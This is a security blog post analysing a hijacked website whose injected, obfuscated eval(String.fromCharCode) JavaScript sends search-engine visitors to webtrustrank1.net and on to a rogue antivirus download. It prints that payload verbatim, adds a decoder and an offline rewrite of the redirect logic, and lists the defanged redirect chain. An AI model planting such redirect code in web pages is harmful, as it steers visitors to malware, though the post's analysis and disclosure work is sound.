More and more legitimate domains are being hijacked: code is inserted into their pages that redirects unsuspecting visitors to a drive-by download of rogue anti-malware programs. Many have reported on this trend, and yet there is no stopping it.
I came across yet another hijacked domain that was redirecting users to webtrustrank1.net and then on to the appropriate rogue website (fake scan). This hijack uses the same JavaScript to detect whether the user came from a search engine; if so, they are pushed on to the next site. If they did not come from a search, they simply see a page full of keywords intended to trigger the search engines.
I haven't ever posted the JavaScript code, so I will below, along with the deobfuscated code.
eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,102,40,41,123,13,10,
118,97,114,32,114,61,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,
101,114,44,116,61,34,34,44,113,59,32,13,10,105,102,40,114,46,105,110,100,101,
120,79,102,40,34,103,111,111,103,108,101,46,34,41,33,61,45,49,41,116,61,34,113,
34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,115,110,
46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,
100,101,120,79,102,40,34,121,97,104,111,111,46,34,41,33,61,45,49,41,116,61,34,112,
34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,108,116,
97,118,105,115,116,97,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,
102,40,114,46,105,110,100,101,120,79,102,40,34,97,111,108,46,34,41,33,61,45,49,
41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,
101,120,79,102,40,34,97,115,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,
13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,99,111,109,99,97,115,
116,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,
100,101,120,79,102,40,34,98,101,108,108,115,111,117,116,104,46,34,41,33,61,45,49,
41,116,61,34,115,116,114,105,110,103,34,59,32,13,10,105,102,40,114,46,105,110,100,
101,120,79,102,40,34,110,101,116,115,99,97,112,101,46,34,41,33,61,45,49,41,116,61,
34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,
102,40,34,109,121,119,101,98,115,101,97,114,99,104,46,34,41,33,61,45,49,41,116,61,
34,115,101,97,114,99,104,102,111,114,34,59,32,13,10,105,102,40,114,46,105,110,100,
101,120,79,102,40,34,112,101,111,112,108,101,112,99,46,34,41,33,61,45,49,41,116,61,
34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,115,116,
97,114,119,97,114,101,46,34,41,33,61,45,49,41,116,61,34,113,114,121,34,59,32,13,10,
105,102,40,114,46,105,110,100,101,120,79,102,40,34,101,97,114,116,104,108,105,
110,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,116,46,108,
101,110,103,116,104,38,38,40,40,113,61,114,46,105,110,100,101,120,79,102,40,34,63,
34,43,116,43,34,61,34,41,41,33,61,45,49,124,124,40,113,61,114,46,105,110,100,101,120,
79,102,40,34,38,34,43,116,43,34,61,34,41,41,33,61,45,49,41,41,32,13,10,119,105,110,
100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,40,34,104,116,116,112,58,47,
47,119,101,98,116,114,117,115,116,114,97,110,107,49,46,110,101,116,47,105,110,46,99,
103,105,63,57,38,115,101,111,114,101,102,61,34,43,101,110,99,111,100,101,85,82,73,
67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,114,101,102,
101,114,114,101,114,41,43,34,38,112,97,114,97,109,101,116,101,114,61,36,107,101,121,
119,111,114,100,38,115,101,61,36,115,101,38,117,114,61,49,38,72,84,84,80,95,82,69,70,
69,82,69,82,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,
116,40,100,111,99,117,109,101,110,116,46,85,82,76,41,43,34,38,100,101,102,97,117,
108,116,95,107,101,121,119,111,114,100,61,100,101,102,97,117,108,116,34,41,59,32,
13,10,125,13,10,13,10,119,105,110,100,111,119,46,111,110,70,111,99,117,115,32,61,32,
102,40,41));
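Decoding the character codes above gives a function f() that reads document.referrer, picks the query-string parameter name it expects from each search engine it recognises (q for google., msn., altavista., ask., comcast., peoplepc. and earthlink.; p for yahoo.; query for aol. and netscape.; string for bellsouth.; searchfor for mywebsearch.; qry for starware.), and, when that parameter is present in the referrer, sets window.location to webtrustrank1.net with both the referrer and the hijacked page's own URL in the query string. The decoded tail is window.onFocus = f(), which calls f() immediately when the eval runs rather than on focus. The block below is an added example, not code from the post or the hijacked page: a decoder for the String.fromCharCode wrapper that never calls eval(), plus the decoded check rewritten as a function that returns the redirect URL instead of assigning window.location, so it can be run against sample referrers offline. The short sample wrapper and the referrers in it are constructed for the example.

```javascript
'use strict';

// Decode an eval(String.fromCharCode(...)) wrapper without executing it.
// Takes the script text as copied from the page; works across line breaks.
function decodeFromCharCode(scriptText) {
  const m = scriptText.match(/String\.fromCharCode\(([\d\s,]+)\)/);
  if (!m) throw new Error('no String.fromCharCode(...) wrapper found');
  const codes = m[1].split(',').map(s => s.trim()).filter(Boolean).map(Number);
  return String.fromCharCode(...codes);
}

// Constructed sample wrapper (not from the hijacked page): decodes to alert(1).
const SAMPLE_WRAPPER = 'eval(String.fromCharCode(97,108,101,114,116,40,49,41));';

// Referrer substrings the decoded f() tests, in the order it tests them, and the
// query-string parameter it expects each search engine to use (from the decoded payload).
const SEARCH_PARAM = {
  'google.': 'q', 'msn.': 'q', 'yahoo.': 'p', 'altavista.': 'q', 'aol.': 'query',
  'ask.': 'q', 'comcast.': 'q', 'bellsouth.': 'string', 'netscape.': 'query',
  'mywebsearch.': 'searchfor', 'peoplepc.': 'q', 'starware.': 'qry', 'earthlink.': 'q',
};

// The decoded f(), rewritten to return the URL it would navigate to instead of
// assigning window.location. null means the visitor gets the keyword page instead.
function redirectTarget(referrer, pageUrl) {
  let t = '';
  for (const [host, param] of Object.entries(SEARCH_PARAM)) {
    if (referrer.indexOf(host) !== -1) t = param; // later matches override earlier ones, as in f()
  }
  if (t.length === 0) return null;
  const hasQuery = referrer.indexOf('?' + t + '=') !== -1 || referrer.indexOf('&' + t + '=') !== -1;
  if (!hasQuery) return null;
  return 'http://webtrustrank1.net/in.cgi?9&seoref=' + encodeURIComponent(referrer) +
    '&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=' + encodeURIComponent(pageUrl) +
    '&default_keyword=default';
}

// Constructed inputs for an offline run: the hijacked page from the post and three referrers.
const HIJACKED_PAGE = 'http://pbxstore.com/iidde/ldzmd/walters.htm';
const SAMPLES = [
  'http://www.google.com/search?q=patrick+swayze+dead', // search visitor: redirected
  'http://www.google.com/',                              // no q= parameter: keyword page
  '',                                                    // direct visit: keyword page
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(decodeFromCharCode(SAMPLE_WRAPPER));
  for (const r of SAMPLES) console.log(JSON.stringify(r), '->', redirectTarget(r, HIJACKED_PAGE));
}
```

Running this from a search-engine referrer reproduces the first hop of the chain shown next (the seoref and HTTP_REFERER values are the URL-encoded referrer and page URL); a direct visit or a search-engine referrer without the expected parameter gets no redirect, which is why the keyword page is all a casual visitor to the hijacked domain ever sees.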
After clicking the hijacked link, we see the infamous fake scan screen, which then tries to get the user to download and install the rogue program. On this occasion it installed Personal Antivirus from malwareliveproscanv1.com. Below is the redirect chain and the domains it passes through. In this instance the domain pbxstore.com was hijacked to start the process. At the time I was searching for "patrick swayze dead", as many others have over the past 24-48 hours.
hxxp://webtrustrank1.net/in.cgi?9&seoref=hxxp%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dpatrick%2Bswayze%2Bdead%253F%2B-publicist%2B-vox.com%26hl%3Den%26tbs%3Dqdr%3Ad%2Csbd%3A1%26start%3D40%26sa%3DN&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=hxxp%3A%2F%2Fpbxstore.com%2Fiidde%2Fldzmd%2Fwalters.htm&default_keyword=default
redirects to
hxxp://webtrustrank1.net/redirect3/
redirects to
hxxp://advanedmalwarescanner.com/go.php?id=2004&key=ff0057594&p=1
redirects to
hxxp://malwareliveproscanv1.com/1/?id=2004&smersh=079dbf740&back=%3DTQz2Tj4MUQNMI%3DO